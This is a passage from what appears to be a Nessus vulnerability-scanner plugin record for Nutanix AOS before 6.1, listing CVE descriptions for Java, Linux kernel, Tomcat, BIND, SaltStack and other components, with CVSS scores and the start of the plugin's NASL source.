(CVE-2021-35561)\n\n - Vulnerability in the Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component:\n Keytool). Supported versions that are affected are Java SE: 7u311, 8u301, 11.0.12, 17; Oracle GraalVM Enterprise Edition: 20.3.3 and 21.2.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Oracle GraalVM Enterprise Edition.\n Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Java SE, Oracle GraalVM Enterprise Edition accessible data. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability can also be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. CVSS 3.1 Base Score 5.3 (Integrity impacts).\n CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N). (CVE-2021-35564)\n\n - Vulnerability in the Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component:\n JSSE). Supported versions that are affected are Java SE: 7u311, 8u301, 11.0.12; Oracle GraalVM Enterprise Edition: 20.3.3 and 21.2.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via TLS to compromise Java SE, Oracle GraalVM Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of Java SE, Oracle GraalVM Enterprise Edition. Note: This vulnerability can only be exploited by supplying data to APIs in the specified Component without using Untrusted Java Web Start applications or Untrusted Java applets, such as through a web service. CVSS 3.1 Base Score 5.3 (Availability impacts). 
CVSS Vector:\n (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L). (CVE-2021-35565)\n\n - Vulnerability in the Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component:\n Libraries). Supported versions that are affected are Java SE: 8u301, 11.0.12, 17; Oracle GraalVM Enterprise Edition: 20.3.3 and 21.2.0. Easily exploitable vulnerability allows low privileged attacker with network access via Kerberos to compromise Java SE, Oracle GraalVM Enterprise Edition. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Java SE, Oracle GraalVM Enterprise Edition, attacks may significantly impact additional products.\n Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Java SE, Oracle GraalVM Enterprise Edition accessible data. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability can also be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. CVSS 3.1 Base Score 6.8 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:N/A:N). (CVE-2021-35567)\n\n - Vulnerability in the Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component:\n JSSE). Supported versions that are affected are Java SE: 8u301, 11.0.12, 17; Oracle GraalVM Enterprise Edition: 20.3.3 and 21.2.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via TLS to compromise Java SE, Oracle GraalVM Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of Java SE, Oracle GraalVM Enterprise Edition. 
Note: This vulnerability can only be exploited by supplying data to APIs in the specified Component without using Untrusted Java Web Start applications or Untrusted Java applets, such as through a web service. CVSS 3.1 Base Score 5.3 (Availability impacts). CVSS Vector:\n (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L). (CVE-2021-35578)\n\n - Vulnerability in the Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component:\n ImageIO). Supported versions that are affected are Java SE: 7u311, 8u301, 11.0.12, 17; Oracle GraalVM Enterprise Edition: 20.3.3 and 21.2.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Oracle GraalVM Enterprise Edition.\n Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of Java SE, Oracle GraalVM Enterprise Edition. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability can also be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. CVSS 3.1 Base Score 5.3 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L). (CVE-2021-35586)\n\n - Vulnerability in the Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component:\n Hotspot). Supported versions that are affected are Java SE: 7u311, 8u301; Oracle GraalVM Enterprise Edition: 20.3.3 and 21.2.0. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Oracle GraalVM Enterprise Edition. Successful attacks require human interaction from a person other than the attacker. 
Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of Java SE, Oracle GraalVM Enterprise Edition. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability can also be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. CVSS 3.1 Base Score 3.1 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:N/I:N/A:L). (CVE-2021-35588)\n\n - Vulnerability in the Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component:\n JSSE). Supported versions that are affected are Java SE: 7u311, 8u301, 11.0.12, 17; Oracle GraalVM Enterprise Edition: 20.3.3 and 21.2.0. Difficult to exploit vulnerability allows unauthenticated attacker with network access via TLS to compromise Java SE, Oracle GraalVM Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized read access to a subset of Java SE, Oracle GraalVM Enterprise Edition accessible data. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability can also be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. CVSS 3.1 Base Score 3.7 (Confidentiality impacts). CVSS Vector:\n (CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N). 
(CVE-2021-35603)\n\n - A flaw was found in the Routing decision classifier in the Linux kernel's Traffic Control networking subsystem in the way it handled changing of classification filters, leading to a use-after-free condition.\n This flaw allows unprivileged local users to escalate their privileges on the system. The highest threat from this vulnerability is to confidentiality, integrity, as well as system availability. (CVE-2021-3715)\n\n - An issue was discovered in the Linux kernel before 5.2.6. On NUMA systems, the Linux fair scheduler has a use-after-free in show_numa_stats() because NUMA fault statistics are inappropriately freed, aka CID-16d51a590a8c. (CVE-2019-20934)\n\n - In the Linux kernel before 5.6.1, drivers/media/usb/gspca/xirlink_cit.c (aka the Xirlink camera USB driver) mishandles invalid descriptors, aka CID-a246b4d54770. (CVE-2020-11668)\n\n - The Linux kernel before 5.11.14 has a use-after-free in cipso_v4_genopt in net/ipv4/cipso_ipv4.c because the CIPSO and CALIPSO refcounting for the DOI definitions is mishandled, aka CID-ad5d07f4a9cd. This leads to writing an arbitrary value. (CVE-2021-33033)\n\n - In the Linux kernel before 5.12.4, net/bluetooth/hci_event.c has a use-after-free when destroying an hci_chan, aka CID-5c4c8c954409. This leads to writing an arbitrary value. (CVE-2021-33034)\n\n - fs/seq_file.c in the Linux kernel 3.16 through 5.13.x before 5.13.4 does not properly restrict seq buffer allocations, leading to an integer overflow, an Out-of-bounds Write, and escalation to root by an unprivileged user, aka CID-8cae8cd89f05. (CVE-2021-33909)\n\n - encoding.c in GNU Screen through 4.8.0 allows remote attackers to cause a denial of service (invalid write access and application crash) or possibly have unspecified other impact via a crafted UTF-8 character sequence. (CVE-2021-26937)\n\n - An issue was discovered in the Linux kernel before 5.10. 
drivers/infiniband/core/ucma.c has a use-after-free because the ctx is reached via the ctx_list in some ucma_migrate_id situations where ucma_close is called, aka CID-f5449e74802c. (CVE-2020-36385)\n\n - A flaw was found in RPM's signature check functionality when reading a package file. This flaw allows an attacker who can convince a victim to install a seemingly verifiable package, whose signature header was modified, to cause RPM database corruption and execute code. The highest threat from this vulnerability is to data integrity, confidentiality, and system availability. (CVE-2021-20271)\n\n - In the Linux kernel before 5.3.9, there are multiple out-of-bounds write bugs that can be caused by a malicious USB device in the Linux kernel HID drivers, aka CID-d9d4b1e46d95. This affects drivers/hid/hid-axff.c, drivers/hid/hid-dr.c, drivers/hid/hid-emsff.c, drivers/hid/hid-gaff.c, drivers/hid/hid-holtekff.c, drivers/hid/hid-lg2ff.c, drivers/hid/hid-lg3ff.c, drivers/hid/hid-lg4ff.c, drivers/hid/hid-lgff.c, drivers/hid/hid-logitech-hidpp.c, drivers/hid/hid-microsoft.c, drivers/hid/hid-sony.c, drivers/hid/hid-tmff.c, and drivers/hid/hid-zpff.c. (CVE-2019-19532)\n\n - In create_pinctrl of core.c, there is a possible out of bounds read due to a use after free. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android. Versions: Android kernel. Android ID: A-140550171 (CVE-2020-0427)\n\n - A flaw was found in the Linux kernel. A use-after-free memory flaw was found in the perf subsystem allowing a local attacker with permission to monitor perf events to corrupt memory and possibly escalate privileges. The highest threat from this vulnerability is to data confidentiality and integrity as well as system availability. 
(CVE-2020-14351)\n\n - In the Linux kernel through 5.8.7, local attackers able to inject conntrack netlink configuration could overflow a local buffer, causing crashes or triggering use of incorrect protocol numbers in ctnetlink_parse_tuple_filter in net/netfilter/nf_conntrack_netlink.c, aka CID-1cc5ef91d2ff.\n (CVE-2020-25211)\n\n - A flaw was found in the Linux kernel in versions before 5.9-rc7. Traffic between two Geneve endpoints may be unencrypted when IPsec is configured to encrypt traffic for the specific UDP port used by the GENEVE tunnel allowing anyone between the two endpoints to read the traffic unencrypted. The main threat from this vulnerability is to data confidentiality. (CVE-2020-25645)\n\n - A flaw was found in the Linux kernel. A use-after-free was found in the way the console subsystem was using ioctls KDGKBSENT and KDSKBSENT. A local user could use this flaw to get read memory access out of bounds. The highest threat from this vulnerability is to data confidentiality. (CVE-2020-25656)\n\n - A flaw in ICMP packets in the Linux kernel may allow an attacker to quickly scan open UDP ports. This flaw allows an off-path remote attacker to effectively bypass source port UDP randomization. Software that relies on UDP source port randomization are indirectly affected as well on the Linux Based Products (RUGGEDCOM RM1224: All versions between v5.0 and v6.4, SCALANCE M-800: All versions between v5.0 and v6.4, SCALANCE S615: All versions between v5.0 and v6.4, SCALANCE SC-600: All versions prior to v2.1.3, SCALANCE W1750D: v8.3.0.1, v8.6.0, and v8.7.0, SIMATIC Cloud Connect 7: All versions, SIMATIC MV500 Family: All versions, SIMATIC NET CP 1243-1 (incl. 
SIPLUS variants): Versions 3.1.39 and later, SIMATIC NET CP 1243-7 LTE EU: Version (CVE-2020-25705)\n\n - In drivers/target/target_core_xcopy.c in the Linux kernel before 5.10.7, insufficient identifier checking in the LIO SCSI target code can be used by remote attackers to read or write files via directory traversal in an XCOPY request, aka CID-2896c93811e3. For example, an attack can occur over a network if the attacker has access to one iSCSI LUN. The attacker gains control over file access because I/O operations are proxied via an attacker-selected backstore. (CVE-2020-28374)\n\n - A locking issue was discovered in the tty subsystem of the Linux kernel through 5.9.13.\n drivers/tty/tty_jobctrl.c allows a use-after-free attack against TIOCSPGRP, aka CID-54ffccbf053b.\n (CVE-2020-29661)\n\n - In the Linux kernel 4.14 longterm through 4.14.165 and 4.19 longterm through 4.19.96 (and 5.x before 5.2), there is a use-after-free (write) in the i915_ppgtt_close function in drivers/gpu/drm/i915/i915_gem_gtt.c, aka CID-7dc40713618c. This is related to i915_gem_context_destroy_ioctl in drivers/gpu/drm/i915/i915_gem_context.c. (CVE-2020-7053)\n\n - A flaw was found in the way memory resources were freed in the unix_stream_recvmsg function in the Linux kernel when a signal was pending. This flaw allows an unprivileged local user to crash the system by exhausting available memory. The highest threat from this vulnerability is to system availability.\n (CVE-2021-20265)\n\n - The fix for bug 63362 present in Apache Tomcat 10.1.0-M1 to 10.1.0-M5, 10.0.0-M1 to 10.0.11, 9.0.40 to 9.0.53 and 8.5.60 to 8.5.71 introduced a memory leak. The object introduced to collect metrics for HTTP upgrade connections was not released for WebSocket connections once the connection was closed. 
This created a memory leak that, over time, could lead to a denial of service via an OutOfMemoryError.\n (CVE-2021-42340)\n\n - A flaw was found in Nettle in versions before 3.7.2, where several Nettle signature verification functions (GOST DSA, EDDSA & ECDSA) result in the Elliptic Curve Cryptography point (ECC) multiply function being called with out-of-range scalars, possibly resulting in incorrect results. This flaw allows an attacker to force an invalid signature, causing an assertion failure or possible validation. The highest threat from this vulnerability is to confidentiality, integrity, as well as system availability. (CVE-2021-20305)\n\n - In BIND 9.8.5 -> 9.8.8, 9.9.3 -> 9.11.29, 9.12.0 -> 9.16.13, and versions BIND 9.9.3-S1 -> 9.11.29-S1 and 9.16.8-S1 -> 9.16.13-S1 of BIND 9 Supported Preview Edition, as well as release versions 9.17.0 -> 9.17.11 of the BIND 9.17 development branch, when a vulnerable version of named receives a malformed IXFR triggering the flaw described above, the named process will terminate due to a failed assertion the next time the transferred secondary zone is refreshed. (CVE-2021-25214)\n\n - ** DISPUTED ** An issue was discovered in the Bidirectional Algorithm in the Unicode Specification through 14.0. It permits the visual reordering of characters via control sequences, which can be used to craft source code that renders different logic than the logical ordering of tokens ingested by compilers and interpreters. Adversaries can leverage this to encode source code for compilers accepting Unicode such that targeted vulnerabilities are introduced invisibly to human reviewers. NOTE: the Unicode Consortium offers the following alternative approach to presenting this concern. An issue is noted in the nature of international text that can affect applications that implement support for The Unicode Standard and the Unicode Bidirectional Algorithm (all versions). 
Due to text display behavior when text includes left-to-right and right-to-left characters, the visual order of tokens may be different from their logical order.\n Additionally, control characters needed to fully support the requirements of bidirectional text can further obfuscate the logical order of tokens. Unless mitigated, an adversary could craft source code such that the ordering of tokens perceived by human reviewers does not match what will be processed by a compiler/interpreter/etc. The Unicode Consortium has documented this class of vulnerability in its document, Unicode Technical Report #36, Unicode Security Considerations. The Unicode Consortium also provides guidance on mitigations for this class of issues in Unicode Technical Standard #39, Unicode Security Mechanisms, and in Unicode Standard Annex #31, Unicode Identifier and Pattern Syntax. Also, the BIDI specification allows applications to tailor the implementation in ways that can mitigate misleading visual reordering in program text; see HL4 in Unicode Standard Annex #9, Unicode Bidirectional Algorithm.\n (CVE-2021-42574)\n\n - sshd in OpenSSH 6.2 through 8.x before 8.8, when certain non-default configurations are used, allows privilege escalation because supplemental groups are not initialized as expected. Helper programs for AuthorizedKeysCommand and AuthorizedPrincipalsCommand may run with privileges associated with group memberships of the sshd process, if the configuration specifies running the command as a different user.\n (CVE-2021-41617)\n\n - An issue was discovered in SaltStack Salt before 2019.2.4 and 3000 before 3000.2. The salt-master process ClearFuncs class does not properly validate method calls. This allows a remote user to access some methods without authentication. These methods can be used to retrieve user tokens from the salt master and/or run arbitrary commands on salt minions. 
(CVE-2020-11651)\n\n - An issue was discovered in SaltStack Salt before 2019.2.4 and 3000 before 3000.2. The salt-master process ClearFuncs class allows access to some methods that improperly sanitize paths. These methods allow arbitrary directory access to authenticated users. (CVE-2020-11652)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-09-01T00:00:00", "type": "nessus", "title": "Nutanix AOS : Multiple Vulnerabilities (NXSA-AOS-6.1)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-4658", "CVE-2017-5715", "CVE-2017-5753", "CVE-2017-5754", "CVE-2019-19532", "CVE-2019-20934", "CVE-2020-0427", "CVE-2020-11651", "CVE-2020-11652", "CVE-2020-11668", "CVE-2020-14351", "CVE-2020-25211", "CVE-2020-25645", "CVE-2020-25656", "CVE-2020-25705", "CVE-2020-27777", "CVE-2020-28374", "CVE-2020-29661", "CVE-2020-36385", "CVE-2020-7053", "CVE-2021-20265", "CVE-2021-20271", "CVE-2021-20305", "CVE-2021-2161", "CVE-2021-2163", "CVE-2021-22543", "CVE-2021-22555", 
"CVE-2021-2341", "CVE-2021-2369", "CVE-2021-23840", "CVE-2021-23841", "CVE-2021-2388", "CVE-2021-25214", "CVE-2021-25215", "CVE-2021-26937", "CVE-2021-27363", "CVE-2021-27364", "CVE-2021-27365", "CVE-2021-29154", "CVE-2021-29650", "CVE-2021-30640", "CVE-2021-32399", "CVE-2021-33033", "CVE-2021-33034", "CVE-2021-33037", "CVE-2021-33909", "CVE-2021-35550", "CVE-2021-35556", "CVE-2021-35559", "CVE-2021-35561", "CVE-2021-35564", "CVE-2021-35565", "CVE-2021-35567", "CVE-2021-35578", "CVE-2021-35586", "CVE-2021-35588", "CVE-2021-35603", "CVE-2021-3653", "CVE-2021-3656", "CVE-2021-3715", "CVE-2021-37576", "CVE-2021-40438", "CVE-2021-4104", "CVE-2021-41617", "CVE-2021-42340", "CVE-2021-42574", "CVE-2021-43527", "CVE-2021-44832"], "modified": "2023-01-30T00:00:00", "cpe": ["cpe:/o:nutanix:aos"], "id": "NUTANIX_NXSA-AOS-6_1.NASL", "href": "https://www.tenable.com/plugins/nessus/164603", "sourceData": "#%NASL_MIN_LEVEL 80900\n##\n# (C) Tenable, Inc.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(164603);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/01/30\");\n\n script_cve_id(\n \"CVE-2016-4658\",\n \"CVE-2017-5715\",\n \"CVE-2017-5753\",\n \"CVE-2017-5754\",\n \"CVE-2019-19532\",\n \"CVE-2019-20934\",\n \"CVE-2020-0427\",\n \"CVE-2020-7053\",\n \"CVE-2020-11651\",\n \"CVE-2020-11652\",\n \"CVE-2020-11668\",\n \"CVE-2020-14351\",\n \"CVE-2020-25211\",\n \"CVE-2020-25645\",\n \"CVE-2020-25656\",\n \"CVE-2020-25705\",\n \"CVE-2020-27777\",\n \"CVE-2020-28374\",\n \"CVE-2020-29661\",\n \"CVE-2020-36385\",\n \"CVE-2021-2161\",\n \"CVE-2021-2163\",\n \"CVE-2021-2341\",\n \"CVE-2021-2369\",\n \"CVE-2021-2388\",\n \"CVE-2021-3653\",\n \"CVE-2021-3656\",\n \"CVE-2021-3715\",\n \"CVE-2021-4104\",\n \"CVE-2021-20265\",\n \"CVE-2021-20271\",\n \"CVE-2021-20305\",\n \"CVE-2021-22543\",\n \"CVE-2021-22555\",\n \"CVE-2021-23840\",\n \"CVE-2021-23841\",\n \"CVE-2021-25214\",\n \"CVE-2021-25215\",\n 
\"CVE-2021-26937\",\n \"CVE-2021-27363\",\n \"CVE-2021-27364\",\n \"CVE-2021-27365\",\n \"CVE-2021-29154\",\n \"CVE-2021-29650\",\n \"CVE-2021-30640\",\n \"CVE-2021-32399\",\n \"CVE-2021-33033\",\n \"CVE-2021-33034\",\n \"CVE-2021-33037\",\n \"CVE-2021-33909\",\n \"CVE-2021-35550\",\n \"CVE-2021-35556\",\n \"CVE-2021-35559\",\n \"CVE-2021-35561\",\n \"CVE-2021-35564\",\n \"CVE-2021-35565\",\n \"CVE-2021-35567\",\n \"CVE-2021-35578\",\n \"CVE-2021-35586\",\n \"CVE-2021-35588\",\n \"CVE-2021-35603\",\n \"CVE-2021-37576\",\n \"CVE-2021-40438\",\n \"CVE-2021-41617\",\n \"CVE-2021-42340\",\n \"CVE-2021-42574\",\n \"CVE-2021-43527\",\n \"CVE-2021-44832\"\n );\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/12/15\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0025\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0138\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0041\");\n\n script_name(english:\"Nutanix AOS : Multiple Vulnerabilities (NXSA-AOS-6.1)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The Nutanix AOS host is affected by multiple vulnerabilities .\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of AOS installed on the remote host is prior to 6.1. It is, therefore, affected by multiple vulnerabilities\nas referenced in the NXSA-AOS-6.1 advisory.\n\n - Vulnerability in the Java SE, Java SE Embedded, Oracle GraalVM Enterprise Edition product of Oracle Java\n SE (component: Libraries). Supported versions that are affected are Java SE: 7u291, 8u281, 11.0.10, 16;\n Java SE Embedded: 8u281; Oracle GraalVM Enterprise Edition: 19.3.5, 20.3.1.2 and 21.0.0.2. Difficult to\n exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to\n compromise Java SE, Java SE Embedded, Oracle GraalVM Enterprise Edition. Successful attacks require human\n interaction from a person other than the attacker. 
Successful attacks of this vulnerability can result in\n unauthorized creation, deletion or modification access to critical data or all Java SE, Java SE Embedded,\n Oracle GraalVM Enterprise Edition accessible data. Note: This vulnerability applies to Java deployments\n that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox\n for security. CVSS 3.1 Base Score 5.3 (Integrity impacts). CVSS Vector:\n (CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:N/I:H/A:N). (CVE-2021-2163)\n\n - Systems with microprocessors utilizing speculative execution and indirect branch prediction may allow\n unauthorized disclosure of information to an attacker with local user access via a side-channel analysis.\n (CVE-2017-5715)\n\n - Systems with microprocessors utilizing speculative execution and branch prediction may allow unauthorized\n disclosure of information to an attacker with local user access via a side-channel analysis.\n (CVE-2017-5753)\n\n - Systems with microprocessors utilizing speculative execution and indirect branch prediction may allow\n unauthorized disclosure of information to an attacker with local user access via a side-channel analysis\n of the data cache. (CVE-2017-5754)\n\n - An issue was discovered in the Linux kernel through 5.11.3. A kernel pointer leak can be used to determine\n the address of the iscsi_transport structure. When an iSCSI transport is registered with the iSCSI\n subsystem, the transport's handle is available to unprivileged users via the sysfs file system, at\n /sys/class/iscsi_transport/$TRANSPORT_NAME/handle. When read, the show_transport_handle function (in\n drivers/scsi/scsi_transport_iscsi.c) is called, which leaks the handle. This handle is actually the\n pointer to an iscsi_transport struct in the kernel module's global variables. (CVE-2021-27363)\n\n - An issue was discovered in the Linux kernel through 5.11.3. 
drivers/scsi/scsi_transport_iscsi.c is\n adversely affected by the ability of an unprivileged user to craft Netlink messages. (CVE-2021-27364)\n\n - An issue was discovered in the Linux kernel through 5.11.3. Certain iSCSI data structures do not have\n appropriate length constraints or checks, and can exceed the PAGE_SIZE value. An unprivileged user can\n send a Netlink message that is associated with iSCSI, and has a length up to the maximum length of a\n Netlink message. (CVE-2021-27365)\n\n - Vulnerability in the Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component:\n Networking). Supported versions that are affected are Java SE: 7u301, 8u291, 11.0.11, 16.0.1; Oracle\n GraalVM Enterprise Edition: 20.3.2 and 21.1.0. Difficult to exploit vulnerability allows unauthenticated\n attacker with network access via multiple protocols to compromise Java SE, Oracle GraalVM Enterprise\n Edition. Successful attacks require human interaction from a person other than the attacker. Successful\n attacks of this vulnerability can result in unauthorized read access to a subset of Java SE, Oracle\n GraalVM Enterprise Edition accessible data. Note: This vulnerability applies to Java deployments,\n typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load\n and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for\n security. This vulnerability does not apply to Java deployments, typically in servers, that load and run\n only trusted code (e.g., code installed by an administrator). CVSS 3.1 Base Score 3.1 (Confidentiality\n impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:N/A:N). (CVE-2021-2341)\n\n - Vulnerability in the Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component:\n Library). Supported versions that are affected are Java SE: 7u301, 8u291, 11.0.11, 16.0.1; Oracle GraalVM\n Enterprise Edition: 20.3.2 and 21.1.0. 
Easily exploitable vulnerability allows unauthenticated attacker\n with network access via multiple protocols to compromise Java SE, Oracle GraalVM Enterprise Edition.\n Successful attacks require human interaction from a person other than the attacker. Successful attacks of\n this vulnerability can result in unauthorized update, insert or delete access to some of Java SE, Oracle\n GraalVM Enterprise Edition accessible data. Note: This vulnerability applies to Java deployments,\n typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load\n and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for\n security. This vulnerability does not apply to Java deployments, typically in servers, that load and run\n only trusted code (e.g., code installed by an administrator). CVSS 3.1 Base Score 4.3 (Integrity impacts).\n CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N). (CVE-2021-2369)\n\n - Vulnerability in the Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component:\n Hotspot). Supported versions that are affected are Java SE: 8u291, 11.0.11, 16.0.1; Oracle GraalVM\n Enterprise Edition: 20.3.2 and 21.1.0. Difficult to exploit vulnerability allows unauthenticated attacker\n with network access via multiple protocols to compromise Java SE, Oracle GraalVM Enterprise Edition.\n Successful attacks require human interaction from a person other than the attacker. Successful attacks of\n this vulnerability can result in takeover of Java SE, Oracle GraalVM Enterprise Edition. Note: This\n vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start\n applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the\n internet) and rely on the Java sandbox for security. 
This vulnerability does not apply to Java\n deployments, typically in servers, that load and run only trusted code (e.g., code installed by an\n administrator). CVSS 3.1 Base Score 7.5 (Confidentiality, Integrity and Availability impacts). CVSS\n Vector: (CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H). (CVE-2021-2388)\n\n - NSS (Network Security Services) versions prior to 3.73 or 3.68.1 ESR are vulnerable to a heap overflow\n when handling DER-encoded DSA or RSA-PSS signatures. Applications using NSS for handling signatures\n encoded within CMS, S/MIME, PKCS \\#7, or PKCS \\#12 are likely to be impacted. Applications using NSS for\n certificate validation or other TLS, X.509, OCSP or CRL functionality may be impacted, depending on how\n they configure NSS. *Note: This vulnerability does NOT impact Mozilla Firefox.* However, email clients and\n PDF viewers that use NSS for signature verification, such as Thunderbird, LibreOffice, Evolution and\n Evince are believed to be impacted. This vulnerability affects NSS < 3.73 and NSS < 3.68.1.\n (CVE-2021-43527)\n\n - xpointer.c in libxml2 before 2.9.5 (as used in Apple iOS before 10, OS X before 10.12, tvOS before 10, and\n watchOS before 3, and other products) does not forbid namespace nodes in XPointer ranges, which allows\n remote attackers to execute arbitrary code or cause a denial of service (use-after-free and memory\n corruption) via a crafted XML document. (CVE-2016-4658)\n\n - A flaw was found in the way RTAS handled memory accesses in userspace to kernel communication. On a locked\n down (usually due to Secure Boot) guest system running on top of PowerVM or KVM hypervisors (pseries\n platform) a root like local user could use this flaw to further increase their privileges to that of a\n running kernel. 
(CVE-2020-27777)\n\n - A heap out-of-bounds write affecting Linux since v2.6.19-rc1 was discovered in net/netfilter/x_tables.c.\n This allows an attacker to gain privileges or cause a DoS (via heap memory corruption) through user\n namespace (CVE-2021-22555)\n\n - BPF JIT compilers in the Linux kernel through 5.11.12 have incorrect computation of branch displacements,\n allowing them to execute arbitrary code within the kernel context. This affects\n arch/x86/net/bpf_jit_comp.c and arch/x86/net/bpf_jit_comp32.c. (CVE-2021-29154)\n\n - An issue was discovered in the Linux kernel before 5.11.11. The netfilter subsystem allows attackers to\n cause a denial of service (panic) because net/netfilter/x_tables.c and include/linux/netfilter/x_tables.h\n lack a full memory barrier upon the assignment of a new table value, aka CID-175e476b8cdf.\n (CVE-2021-29650)\n\n - net/bluetooth/hci_request.c in the Linux kernel through 5.12.2 has a race condition for removal of the HCI\n controller. (CVE-2021-32399)\n\n - Apache Tomcat 10.0.0-M1 to 10.0.6, 9.0.0.M1 to 9.0.46 and 8.5.0 to 8.5.66 did not correctly parse the HTTP\n transfer-encoding request header in some circumstances leading to the possibility of request smuggling\n when used with a reverse proxy. Specifically: - Tomcat incorrectly ignored the transfer encoding header if\n the client declared it would only accept an HTTP/1.0 response; - Tomcat honoured the identity encoding;\n and - Tomcat did not ensure that, if present, the chunked encoding was the final encoding.\n (CVE-2021-33037)\n\n - In BIND 9.0.0 -> 9.11.29, 9.12.0 -> 9.16.13, and versions BIND 9.9.3-S1 -> 9.11.29-S1 and 9.16.8-S1 ->\n 9.16.13-S1 of BIND Supported Preview Edition, as well as release versions 9.17.0 -> 9.17.11 of the BIND\n 9.17 development branch, when a vulnerable version of named receives a query for a record triggering the\n flaw described above, the named process will terminate due to a failed assertion check. 
